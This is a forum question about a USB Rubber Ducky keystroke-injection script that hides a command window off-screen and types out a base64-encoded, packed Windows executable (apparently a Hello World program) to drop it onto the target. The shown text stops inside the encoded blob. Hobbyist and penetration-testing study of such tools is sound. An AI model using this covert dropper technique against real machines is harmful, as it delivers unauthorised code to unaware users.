Jump to content

[Question][Payload] Problems with Hello world base 64 to exe


overwraith
 Share

Recommended Posts

I tried making a duckscript that would take a base 64 encoded and compressed executable and would type it out and decode it. When the ducky runs it flashes red 5 or 6 times, and doesn't run the script. Can anyone see any problems that would prevent this from running as described? Is there any size limit to duck scripts?

REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM ENTER THE BASE 64 ENCODED TEXT
STRING copy con HelloWorldBase64.txt
ENTER
STRING TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
STRING ZGUuDQ0KJAAAAAAAAAD/KMSbu0mqyLtJqsi7SarIoNQAyKlJqsig1DbIvkmqyLIxOci5SarIu0mr
STRING yPBJqsig1AHIs0mqyKDUMMi6SarIoNQ3yLpJqshSaWNou0mqyAAAAAAAAAAAUEUAAEwBAwDjzzdR
STRING AAAAAAAAAADgAAIBCwEKAAAwAAAAEAAAALABAKDhAQAAwAEAAPABAAAAQAAAEAAAAAIAAAUAAQAA
STRING AAAABQABAAAAAAAAAAIAABAAAAAAAAADAECBAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
STRING AAD08QEAJAEAAADwAQD0AQAAAAAAAAAAAAAAAAAAAAAAABjzAQAMAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAABVUFgwAAAAAACwAQAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgVVBYMQAAAAAA
STRING MAAAAMABAAAkAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADwAQAABAAAACgAAAAA
STRING AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAMy4wOQBVUFghDQkCCGzXH8/Zo89GVcsBAJYhAAAAlAAAAAAAcaEA
STRING KpAARgFUIIwCqEAZBVCBMgqgAmQUQAWfo4IizOm2ZrPZ/SMAAOlRJAQ4ENcgshLu9z3daTIYeFkJ
STRING 7h15ISKn2f2epCET4g8O9yMkD/l0n7vWDTuf3CX2Jp/naXYYgymMgxCJIJ+n+zSEuTFoDgWACn3f
STRING 93QEy65UEXd4Ip/3fd/3Sl4TFyw0OxWuaBP3aX7fbwSCCdUxPMUeGGw+zWbAEQsnsIExtiJ8ke7T
STRING Z1IbgYVjY3u63/dYCZmBNAwOxzqu7D7d75Xv8BUTp9YDT/Ef6X7n07z3DRjdDpqo0/2+77O9Lh1X
STRING GMIwn1/ve7rP2pkkLOALSs4d3/M0v9Escg6JOBUEgL7v6X4OkygJlO93CLPPut/TffIQDhdKVHkl
STRING BIZi39N8fzDIB9FSCfu+5/snSGghHjGHGLTb6T7d7xMTehtAP1AMHQ/2Pc3v1iLDJw5XgQ4TENjy
STRING MALfB8wA8i//EFWL7IHswABTVleNvUD//5+NxrlnXrjzq4v0oQABkyBQ//bdt2gFaDiLDQsMUehu
STRING /CSDxAiLyP8V2NfcdxAkO/ToohEqJDAT399028weBBaLM8BfXluBxGE7bd777+zoeSjlXcP/JVZ/
STRING av+Q267dOUJYZGoAUFGOUAH/bklzoP5UjIAAM8VQjUX0v//732SjLYll8MdF6AmLRQxQ6Cr7mQQz
STRING 7bfW/smJRdiJTdwTpAFVCANRBJ1277rfi8qakvyX8yaJhbD+BZW0+2z/bIO9AHx5fwkKsHZuO25k
STRING 5Ai3qKwF2n//z4uFO0XcfDt/C4uNGDtN2HYuOjOZWd4/AotNSD15NyPbWyubG1XcQ6Ck6xTHLcj2
STRING Yg3HCaRMN/fYYyFNyIskiVXMk/pNuLvf2dzonEX2/A7u+cL4/63r7dt1Dh/og8gE++jp5CbGIXc2
STRING B7ABxZMA8fr17pvh2IsFJcByQ0APhOtUCgvb2+sSN8iD6D1NyNlj2Xa/2wuJCH3MAA+MzR1/CgvI
STRING aQawd4bBo18EkTQD2LmIhbeBCG+vjf2MsPQPtipQ8Q/3jDRjIhBMrI0FFIZw84mNvOjM+YEYt3B2
STRING J4fIHI2FHo0MZrbIjaMl+YOnXwIn4d+VBoXSdAsi6wXDEXajuWvKPXVupFqhJeHK+SYW4qAcst0W
STRING 2VEmDFKotBQD8jHZo/kTsNiX7JGOdRGw3HQJenMlLwDhD4VoKPmRnEoeBvnj+Bk5ks/UY/jg1FuA
STRING HDngvPd8M2cJe2oAasaiGGg2V3L36y0hAWoEHEH4F+xtMvG4EglewwxV9lkyuGmYbRFKBDPFbs5M
STRING DU3B7P48hVj31IT/LpGxixTH2m3btc3HLgnMpfYOWFpBkWN9t1eJDVhZtWAB1u26ycP3DQAt1LhJ
STRING CAuBwVh/4F9PawDNJH8Ci2RB1QcGkcsIgfVHMalkZZP2Tw++wQvjDIsQlTsRD5SaxiBsZUVP4pkM
STRING Qtn/Q9+Iz3ayBU3MUU4oM+GVwSVZ4E3sA4Mk3dq08931A5z5u+YA8BoiD7bAhcB0TenK5gD09/Qf
STRING LYx05gjXEMj49oaw08ZvqhuaI6mb9IhBBF8o7EMwOvKE2LF/9MIEuZFMQihfuM0IyRpKRujTxjp3
STRING kPN1FO7SCBrsuYdkbbjzS5NyDoXNOITwjvOizzaSA1vBNLDaFm/b+JH4nUAE90bAA8YSGQ49gU/Q
STRING QEqeSTA0C+7A2zqJCAdGBulKjXEyMEPC8jRA4D14hSGg8itdgcG610IFJPQJQpIZw5lu0CF+OBPQ
STRING AluFPGvyz6PkBRbH+vFzI1fI2PEItiHEIBHCA6bx50ZGxsYrHAUYFBD8RkZGCAQAKZL8z+fz+ZL4
STRING kvSS8JLskjZPCJHoInUBw4PsKLEZlghSIeEEICHbPBdBjvEIWlir/7913Yv/LlEqM8Xyi9mJffw5
STRING Pn5I6wiNsb/wx6Qk0pCLRh4MOIF8Gfxdrgvf/w+LVDgEA9GBPBoOdB1MOBj7pVn9BFFS6BzwFRxA
STRING g8cMiQbHVgl8OwZ8wmB/Vou2/7v48YX2dCE3HVOLXQiF23QUV7Aa/uPb7bdq86qLA4mCiVZRM19b
STRING XivftWQrv73B2Tv3dFL9zt5nw0uNm8C/uio5VNu/a6jEkUTAwTkUGHQZi04bVGKRC7sPsgRSI1zv
STRING KXvWYsLEvcEUdQhh61pqrsaorn1HHfgLl7dfuEo5FhQ5VhR1CgQYdQUcdPJd6KUTTQRXVhoi8FEM
STRING gUx2e0YMfjD8GwaVwOH2dgRPSXW2LCHQRjdOgD0RgTjTH3N/O9duAQMBxgUSAegz4ee5EcJznO4Y
STRING kzQxJt+DNugD7ykUaWv/A5fIOw1CdQLzw+nL7R8ZUJgQDsSP6HSJkVq3eaN1SExarL/uRqCApkWk
STRING F4Vooe9+wPcECXhVsIsahUCJEXfr1wFutBKFPJDoWasNLDt36MTshtWAJA7pAsNKmbEDUrh5G3XA
STRING s8Ig/9lgk7wBwN7FRiCQr1UAI+jJ7P2+9kw7mki8UGgEjIw933dEUQtABEQ8aaS3b+8zHShMggUA
STRING fQpqs+btmDDCYkV/H6XM0TVT2BGeJsG32eAf0f59cJaHY+DYgtZS5OS/MRjkCVq2A/DohMPBfB6F
STRING fLe/aftswWBA2Qbc6Kx0dbYNh7nV4BHkVoj9NjtN4NmFZDByKf2lW6tyLHQe0tw7VeB1Cc82/sgo
STRING 9OsNaA0AVTjrE1r8schuVAF1DGofTzTuvbfZ60sUgzjHBQg2WRoY4d1mGARjDOgvFQh8Fh7Z4tyV
STRING 1P8x/tTpU3fY+e0s6wo3gVhfHEB2FvlmYghgAOh361wCJO7WBU8CdCJ2yMpo3Dq2zQh/C1BqAp2I
STRING g/hFAZO5WwFS7nUNIuk06WsVYj1KbxOAqncaulnFngxAAhczhhmMvYymkKyM8c6BBhqBFPkYW2A8
STRING AaGiDBFU2NhvG0h1DClUUEaUFDgIY8tYBg6YAetSrgUduElnArQJ4dm2AWDYS6Xuw4vctjdhbYsW
STRING Ug12U1EitkBGoHWrFwHZmPCLoo0YAQj/86iDN6QYGw/OCG3/jkZ08Pn8D7cIgflNWh90cOwWNubr
STRING SS78FANCvG0Z7LvG+IE5UEUaLvgsvu8G+UIYPQsBHCCDeXQOdx4PhD/iZgaDuj4PlcAg0YjYAo9s
STRING DUwbvFkEdyRZhZBAqsG3uhQGbAX5/3QPSW0/FmgsUWZEosQQUrrd43O/GmkoUrgFDxq54B8kX6yy
STRING IW/xQHQtGJUOvOfwENjiDk4n9H0UU67IRzJ3v7S9wAXHhcTttedBLLYY0h3Q9Jp+wb6kU+i06RIk
STRING izUHTKNp07Ew/1cb6f3g1k0rl2BTW3Mm3tTxGszvTQMcDo2V1GuVzNf99pqxhQdGbbBoAhBy8NtC
STRING 7Elvi72NSyWLICVvsX/DvR5kUFNRV+h9AvYcD4Ui79gvdC0yhgKwAYO9tYu1qpFc9611JPYPhAQc
STRING hHCtwe29vkgu8lAWg/T9c4uNLbuN2FASrez7qsXgdoPD++RD6N9E3Z+h5+OnyChSV2ioYHhtw2s1
STRING PIgMUUc0afjiVq/Z6Y4oPQ9EWKTB9WgK6wD1Ju7uBiEGu0RI/9fcBo2dOnNL9iEwWeD4MI0GaQb7
STRING YlEwvjC1hh3O9iGUwLSaLQpvI1JQndDIjcnW4VL/lQy7HLGQWv2l/LwzzVvozOVPwzJgECCvkC+t
STRING kBPsJHaIRef/V45L0cwBNXpN0I1V54lVfGHhjtTajU3MOgYOiBNtQOvA6SP8UOsJuDMK3ZHVWgX9
STRING PdypkAEbr7CyOUOSArKvuxD8LdvI2NwLFODBVcxSJ7AGhR8IBCNGaCASEP1ByeEY+L3uUh9bAXbE
STRING gDg3CpbvyC3w/+2NcQE9ihFBhNJ1+SvOg8EtVgBuvdvYRnd72fw0M8mNZKWKkfb/3pu7fIiUDRIq
STRING 7ovQighAhMkzdf9XiA8UK8JPik8BRxH43bdLvVPB6QKI86UIg+EDuDmYqcHe2/OkC4oQQGMuwey1
STRING BVtYMC4pX6/0bSppX240yBAbufBcaolTjFAt9/oQgPRSySUNC+jB4goGchBWP0QBEqW6BVwdCxjn
STRING v3XQgoFiRL1bgwjPYqGOOe/Wb7DZ2EG20lzWEsukUBM+9/XEWKxkw7IYIKr3a9UebU3QwyaYUQXa
STRING Pf/9ZIPqJFIIWI1+IFdIBG7w3BKf2zzAagrU4NAyhSW68CdoRbT46Ahf0xuDzjU4HzK0QW7s5CvQ
STRING zI0APMBRhiu0831UjZQFDVKPTcLnwufWo8D+BFNTo/n3TR7CKF9UbOFJaCFWhEYBqw51gRIBQk5K
STRING 4d8zaOgYolNvCN2YnrgBjSvG0P9WBk3wS1cQcgW5EG75mkZYMvGKHDDyQMtHzCqBi8HfgwLON0zx
STRING G36IHkdG68nl/Y0UGoF0+3nGBAcAAxcAYmm6kkFPBBRGCCE9vGC2e9eQRZBBBqRDOncyRTLSP6y8
STRING YOl5FW/UFDkDTki36OYEabr3PITfjUUiEMXYw9v8TAkfCAmLBHDgbJazJECPH035PrQZWBNFIo1C
STRING iRSCFajFBiVRmzPw0cIv0WguBSsBjpUobAA9MjIyZC9sbGgsYLEQVxY3DhhjVZ/ADygDmzf3A9CC
STRING gFIFfIkVeIm+m5ubHXSJNXCJPWxmjBiYs32l2QYNjCBoFAVzszRLZCVgLVycj3q2scKQKVaEBwSI
STRING OdriW8sIB5Qf4O99vQ6OudABpqEcWYQexzaOE3gJZMAJfAGF9JX7CZSJjdgzjYD6JuQu45XcCz02
STRING yIAILbTK+d6Y5Febzh2gPnD4RJJo9k66ZcgKJV5oYR1BWJw1ZNdgfKUcNGGvX7mo/wD8Y3Nt4HVP
STRING OYN4EAN1RPs++3/WgXoUIAWTGXQqJXkUIQ0cJj7suxAIFCINDikAQJmKRHsDl+g13cRzBIdwNF56
STRING UmVMeJH/AWgVqddQbIwDvB/kHyNrOJ5vccgEkBhPEgTJ5RqiASm7bnprRNZhbF0IGCjv2i5Eg1NC
STRING 6xnRHLNdgCXaGPIUUgsQBuaWAF59Q0DCXsLGh7g/pA90wzuaVnJ2jIvG03iQcwIbdLRjBnsCS4MF
STRING OWHv74H+EnLtXiwveZjB5JQce5x7nCATcmWf0OzgjIZYT3hDnMNSJVhL5IzjEq9wO8YAwGRr6Ygm
STRING BonOhTpc25AVTPIl+ThSR2jcrOFSSw/cwlXkNwgULYhw4aR+v9yH4QsmI25f5FFueM+D0DJiUn2F
STRING 6ApNuo8CIQt5zaFjEEjwOTXfJNG5DZwo27YyNsKyWOGsBajeNiUxpB8YsviThP9wEBuBPWhO5kC7
STRING dB9zZ91aQT5ddBMI97ZgFt7RiQdXmyP4+i1aMHGIHxn0ruZjbYMzCIkFFIwzRfRtMiBjC5CUPNai
STRING lZPomDZnPzvi3RzsgX30gCT0T91vM3UI65IU4oh1ES4NG3vv2xFHC8HgEAtJNpQAJAIlxLr30omk
STRING XGSEkRMzoJw/mF6kZGSUjA3YasELIBEn+nOPPSw+O4sUA0g80b/t7rDgOj4gw4PAGDUdFkSW/PxH
STRING BdkKLGJbT39FEEa2Zwj8ywGt3f3Gt0IUXY1UAWd82C22dQ74cgGoe8Eokzfhbr8kBjkScyMUMTtR
STRING DHfr3d1yFpuLSAywA0oIOTVzBRAgFEJ76wTrv5xUIQ/kEg/wxNjKEK1IFoxJcOOwjeTdLNj13oQ0
STRING xXXgAJclJlNQ2v0rlJWLC5inYzLR160ID+DFE7ItEzfQ0Oti/q0eb5+LUSRUuvfaG9KDwgEUT1YK
STRING ByHM60DW4FSDRDenAx4uFirF2DB3PZcIsNBCo5QswXaKYU/YyFrI6wcL2BgDQiSFiAUEQ9bIhIAP
STRING FOHD62xLEBt4GWhrhi0y+OjF10E/gT614TpVRDHHAMsj/XbhHKC8UPdOVmaJCrJ0U3sbDYsHD17T
STRING bJwNnMBbGDbAUVIseOTjv/2fbhLAuQlmOQp11otCPBN+zwPCgdbqxqc4AnXFdkgGBQV/oX6JYo1E
STRING ByQrXjPbhcl0Fzf+F/qLEDvyctr+K/o7cPxyCEOwKDtuu+jt2XLpA3RbQ32FUDwggzVQYvkITEgb
STRING ZKO8pe/uDHE6xgUfAUChEVv/5AI1cowz9jvGdBpv8LiVgrtSqFZWjWkFVlL2ZHc7h8QgyAlfW8rw
STRING iwGDmel/44l1gtI9taUxAQ+FjI0WT7Xf60AcsVeIVjqkcIC7QGMb6F9SIFAb+doL+FBXUzkaS/RJ
STRING pOuWb/w5aPxuhBgod6pne/w7zgodEftNtwad5/UA/ChM+FBraNNsA+AI7FBZ0j9A3Lri31C3FDvD
STRING s9m335PsO8d3BwMmO/hyEztNR/ON9HW26aY9+FmrPY9CDx94Hw+DoLUMxdVRrHXAJwx8JYCL8Fh/
STRING 3SnegIVWhMWO3CzX279QgHRSK310PnJL2Kit6/9/O8h2Cjs8xnIFQDvBcvaLRMbRFC/Zsy25JW7N
STRING AUn0cEI0mDPFEBsDSgfhXdhZAVaIhH6Fnu/2miM9CFBACeg4pWrmefAoPbWABYRBehgDGcgPFOYA
STRING jaDBUQtHUmNEjlQv0t9RRAUOI8H2+oXKRX3FCB+PYDdwZVzMiqcDe4I/vknXilcxiRIselbEinWu
STRING 6NYxK7oHNgweDetDQKBdUnVCEKEd7BkwP4VQWeiWFGOzgD9ZPwJVcgwwnRZt0XkgL2EvHAJWaAf7
STRING jHFzfMJcdQ9199C33wgnVxdYJmxWmomFTh7Wuei2oBCeztBT3waw+SJYi9glNA1I021ROkP9JvT9
STRING u/tgKgBy2GiEgP+VS3s9tjVcVoBsW19JVfssBBl4JvCLjT/P3mHQX+RMSqBR9gp338eFIghR/9OL
STRING QiGCet+CtXhTi3Wog70w/G9jt32fiyqoCZXR6IP4AnKOSKr7vwtgnEVUdYNmg7xF8glcxxZw3LK5
STRING XBysjBlAg+8gfuvK/yvr+g4PglynSA2B+dDuwQ/HD4dNpGRyROxjx/7cckiNhDCJEBRMiUgEFzKy
STRING jH1QiVAIEVQMWBm3ZewQZhJcFGhQGE30DeakwVwJzV7oc8+zKFAZWN8GU0zIDAYIe3kzHy9JHAvp
STRING +xdYoIkO+WYDt/RCQ3MJvtDOJOcR3s59TE6ZziWo/DvXEbnVagklstBe1RnGJO/enGEZBFHomLsF
STRING C9bASzUPEG9tWaodHlbo4jRkzxgrkgvba0BHK84yMjYWI3wFeHQyMjIy0HBsaDMyMjJgVFhcZGRk
STRING 5JKkNDg8ZGRkZEBESExkZGRkUFRYXGRkZGRgZGigZGRkZJyYlJBvZGRkjIiEgNH5XJyRkpKOy5Io
STRING EArTLysABSAkNZUKKpDR//IWwenPvlQkCI1CDIuKnN8I2m/FM8jorb0GMHzc6VsH8pe1vwkvi03s
STRING 6cwkU/KTkf99fRTpK5zcgwwgTUTp+x2lggqMVmhFAQnQhAIii4B8QFAZjwEToAlPAZABEvADVSVP
STRING VQEBbZMDCCwGATLIgD0CAwMEzSCDDAUGBwj3vYA1CTsnExADZiB7TSA/WB9AvssOsoAgMCTAIw4L
STRING YVf2E1MQQl87fsgOIIdwYXVzZSxIZfdf8v9sbG8gV29ybGQhISFmADoAXABkAc3dzX9cAHYAYwB0
STRING AG9sAHMPYwByX3fd9swAYh8TZQlmEXgAOJJtL9kANiEZB2MPXWGu2yV4Ay4NAF/MXdfdAW4AYS1p
STRING d2UPcwB0bS9Z+z91tQ9N0z3rTjfWASAzaTVpG2wF/wewrnofZF9Vbmtub3duIFJ1YBf+/250aW1l
STRING IENoZWNrIEVycgEKDSO39nL3U3RhE21lbXkgYRkqZCD2t3/DX2EnY2Egd2FzIGMXcnVwdGVkMf32
STRING d0sAQSAebCB2L2lhYmxlt/ZmiChiOWJlZi8PaXSWvbVjEmluCCBsaXo9wxLYynNkZ92tsG1lc0p0
STRING s4tzbZRl9m239nIgZGE8EXlwZGg4YXb2sVs3YZBzDW9mHi4gIEkJ264F+3RoaXOFWP9vbkAstUbb
STRING 2iB54EpoBAF/9942txtrJUhzDnJjZT0Nhce2sXJ3uGgNYXBwE91rrblw5kPcFDNeRru17W+vIGV4
STRING YW1wkToNtAljjLb9/2VyID0gKGkgJiAweEZGKTsWQxVh7rPtbmd+Z1dvZGWLl/BW2Lr4adAgn2xh
STRING ZmawZji2l3QkcXUu3YtDe9vCSnOpdEGDwcgOYwdIRy4nAHhs665UWnZodfNFU1BvC+9FJonrY2x/
STRING c2F2WG6YD1ZjchUgZmPwdc1wQRyz/1TDafeCde7zry5hqU8iCreAvbE1sGNsH5Zsi+BQVhBlJMwH
STRING bDbhbnacGzRwb8MtZA+4cjwgZGkukBDAXHI0RBemaW4fAWtAA2nowIARsmGbTCgBHgNLOkyauyij
STRING BLaEC+MnACfMLmsieCWDSyM3JrdIs+3FutVLdBIxtGmVHS661y1U26aNl9hGYVF1fSMlVi27jSnr
STRING ICVzB006dYVOYSu0CWsyF0Y3PxTzlusNV31hLQBUbss9Vm17QwBoB8trCz3Wba5GdRdsI3IbIwAl
STRING BljXdX0gLyAJc6ebm8DGT3RNRUUBb0Sge3MD8AoADRFVE9c98A5vK4sgX2lZu67bXHATGXkPUptD
STRING F00AQYLrmmVzFWcJMtpIwoS3m+5lsCRMaLF1AKAzGgl0JHxhGfrUeMy79YopYnkG1mRM171p1H6z
STRING wsiLmgETPiCu5Q5ZCnADmQRIrgJzA4cAMeba/QpBZGQ6czqxD1NjsWDNeAwbYURu2ayH6XVtYomq
STRING wGDNwGVvLU9EfRF0m1qfPHdzTMBmQQt1hoYbTjXhMwAyo2TFS/q+hGwLLjJYQ0ElsKQESSCXMDjA
STRING lh76TLk2LGGwtVv1bDbCIK9TIUgGM5hDoZ8YvAcxmpatlWxYKRtP4FBN0/yFAwFwwIxwPFnsnjUU
STRING F4F4A9AA36npEAq3X1NvaWfx4hRRpUMo0CN1YwF2E2mpKgApPre5zVYDLAsHeAMBMSYZssEHMBcz
STRING KXUPKSzH33RbZfRlus1z6XV7dB9jITSLjblplwB3xr7YEWn5JVz5OP1biYR9OVMAUABEAEI6zHWD
STRING 9y4LTAEbVpYyButfUhtEtQNwXHhzclBEQk/xblY3Yl33bOVlNUWJdo9y9W429r3zmUQRZecJLQOv
STRING rHmjAE9d2T7XdaVXDXtFx00z52/QCJ/r5W/V71ZRdTbCGI37UylkX1ytC0ZdNy4DXBdlQy87PsLg
STRING Uz9lZ0OiZUvXaHHYZXkPURTjzOZesDcGRXhXE98iEJMaum2ZRFFBO0nPhGVvCTcADWMABAKsnf+f
STRING AoQjUlNEU9oOOno2O/NO7uCv/4heRUftP0ZnBq86XFUsc1xDtcGtJvByc1xEAGvuAAe4v3BcHBsS
STRING FMIH7GJ1ZxAucGRivA8ihERsAQFSigCMBBsLAMhHUQEA631gwQFAXwkqAceICkir73ygxUhulP8v
STRING QlA22FlDegMjxCuwTjdYyBIvR4A3G2DBsy99DOYvIBmQC7A82aQ73zP+B8QPhBxY9wEWJAM/H7x1
STRING r7DuG0QDSh8cBgMMHRvIgR/MhCWj6k7IgT+4KWkDg1AxoEpvjJUU3yKxGb9EAZ8fKiPYNwv/ACMF
STRING UcKA8yCCQgZQAVm06gUgLlN8NJLCSxAmiElA6Wt+a6D4ZWRFeGNtZRRTbGVlcCtEfMIbQ29tcD0i
STRING EkT5L0hlYXBTZXT3tz8SxG3tAVdpZGVDH3JUdG0DxW9Nc0J5PkRzEHE7FQszclCsJWvNY1ISHSgy
STRING z9r7NhRSYWlzX3hMbHPW2rK1dHsuQUdmOoX+24SIaQ9Mb2FkTGlict72tt01eVcNVFhtaW6BZSM7
STRING mfv3Hy9DdXJyahJVbrZSRLKtZE5kYLAsWLm53OpGckw5LjZSROBILV0BokDxVmlydKDTK6IL2B89
STRING ZQMJB5esV51mEhj2ZoeI+ApfJNsVcTtTedBlbWtBcz6BHcDeCatJZBShBWvtVGgF7BMxibSxw0KH
STRING dUGPUAOFF2sjfG43Fs5rhtkdFNxQb2kOoUbAXmH6RW4rEiGiPc2J6D9Lff63w35naHRfZTJAu2RA
STRING QFlBX05YWq7d/u8gX09zZnhAPyRiYXOTX28cpbQmivZtQERVEcVfDvxs1i7LdHMPNTtRQUVYWHfb
STRING jmdvdEBSc188ZRtLtgU7QkVYa2VWI8DeQplSNlBBVoUV8mOPMkC6Zmx1c2i7Mdg2QWcxQHexdGjA
STRING yh5sAEpeYWdzHbAWxexIHK7ewtKxiUQ2cmQ/ZhYS3mxE4EAYnLUihmMhETOX3VMgUzFAQTlzcGNA
STRING 7RBWYHBUSBBCgOR7eD5ucb0UwvZQQkQEQJQiBFfZgh8TdCNFz0ZHIK9IlUBlENqQTD8BAB1xrG2D
STRING LDIFQz82m70NkHMwPFA2QQgFZrPU3ksBqpdUk1230tJfd/5rotloX+V31hba+2NzY3B5CRdVbFQY
STRING +KxBGshfCXI0X1rbDlzsbW1kjG4aJ7KtO+AI5gZfH2wT1XKzVgcVLiKGQOm9nmxmcEykca2AOx0P
STRING 1CAlObxSCwLmZeE0wNpzUAsqfAzbti9dK0NEYmdSj28IVw/WocI1pn/dwcrtDV8uLW52iTusbbBj
STRING B1jfdL5fE65V0QZfc1SQymQX3nJn6llzZxpzOgdF2xBwtlIPZuvN3tv0ZAf+CSEQabYZXJgpBXLr
STRING px6AInBndHijZWZg/v+zUlRfUlRDX0lOSVSaQgcF/j5DeHjhCEhZMBYBdzMb5/J2DIqtsAdliVlz
STRING l7f//x/xxQQGBhEOBiYOKD88PohgIiOCJ3sEgCLs////EyEvLgwK8CACKTcjIBEckCkeG/D2ACKm
STRING ImoGAL+V/w/wEgITRQgSFwgLBQ4HBhIIBv//u/cOCzcNDAMIBlEFEhgRKwYlCBUJCQUqCghr7dvL
STRING BQ4MCBYdCBgICS8Ae//v2m0INQkvAgUM1JUHG0pPRyQ7SiD//+32JTEovzs/WgNRbAtLOjQFdwwc
STRING Bg0HBRsGe/ffdkgLIAQNDi+qB1kLOxqLIwcfUeXk+20kAhwQBxQGAAcI7XfttwwtBgoKDAxHkhgH
STRING 4AYQDpjftm37cDAHExYCGhQUBR8mBxUWBce+/e0KBZUgJgsNCA8VLRBJC0LfNgFrvy1sIxkGAQoi
STRING BUwdXHXCf9v9vwdRzgeCB/D5AAsZFSPlC3cFIw4ZFjULkH/7H2UGDwkAChSXWRqJBs/P///wWw8w
STRING MPA3HvAMA/AEAfA4BwTwgAQI8/b/bgiQBhkUAhQIHAgkDAE4BBx/BxBbIAIAfUwBBwDjzze2fzCC
STRING USfgAAIBCwEKDFQRgj5rQBNjEQFKGKvgewMUELYFa152KFsHANAECi17bzsDJ4EoAgflW86SBi+g
STRING UAewBK2MiFkvRrDcNu54AwcgdxzIFXJ7BTSiL+QB7DP0xi7NeHRiRLcQJ9tFlgug4AvhUrgvQzbh
STRING AROnIGAucpruCBXKNh8ncCDFugtpWEACLiZKmqa5J4QFkAJ4dK80e8AuaSgFiCcOgvsA0npyc3Jj
STRING CzsKIE03sHcGiMGezVT49ncMwCfh9puSjkIbGKQDdsc8AAAAHzLJAQCABAAA/wAAAAAAAAAAAABg
STRING vgDAQQCNvgBQ/v9Xg83/6xCQkJCQkJCKBkaIB0cB23UHix6D7vwR23LtuAEAAAAB23UHix6D7vwR
STRING 2xHAAdtz73UJix6D7vwR23PkMcmD6ANyDcHgCIoGRoPw/3R0icUB23UHix6D7vwR2xHJAdt1B4se
STRING g+78EdsRyXUgQQHbdQeLHoPu/BHbEckB23PvdQmLHoPu/BHbc+SDwQKB/QDz//+D0QGNFC+D/fx2
STRING D4oCQogHR0l19+lj////kIsCg8IEiQeDxwSD6QR38QHP6Uz///9ejb4AwAEAiwcJwHQ8i18EjYQw
STRING 9OEBAAHzUIPHCP+WROIBAJWKB0cIwHTciflXSPKuVf+WSOIBAAnAdAeJA4PDBOvh/5ZY4gEAg8cE
STRING jV78McCKB0cJwHQiPO93EQHDiwOGxMHAEIbEAfCJA+viJA/B4BBmiweDxwLr4ouuTOIBAI2+APD/
STRING /7sAEAAAUFRqBFNX/9WNh/cBAACAIH+AYCh/WFBUUFNX/9VYYY1EJIBqADnEdfqD7IDpNS7//wAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAYAAAA
STRING GAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAASAAAAFzwAQCW
STRING AQAAAAAAAAAAAABwsQEA77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0
STRING YW5kYWxvbmU9InllcyI/Pg0KPGFzc2VtYmx5IHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQt
STRING Y29tOmFzbS52MSIgbWFuaWZlc3RWZXJzaW9uPSIxLjAiPg0KICA8dHJ1c3RJbmZvIHhtbG5zPSJ1
STRING cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAg
STRING PHJlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBs
STRING ZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiPjwvcmVxdWVzdGVkRXhlY3V0aW9uTGV2
STRING ZWw+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90
STRING cnVzdEluZm8+DQo8L2Fzc2VtYmx5PgAAAAAAAAAAAAAAAAAAcPIBAETyAQAAAAAAAAAAAAAAAAB9
STRING 8gEAYPIBAAAAAAAAAAAAAAAAAIvyAQBo8gEAAAAAAAAAAAAAAAAAAAAAAAAAAACY8gEApvIBALby
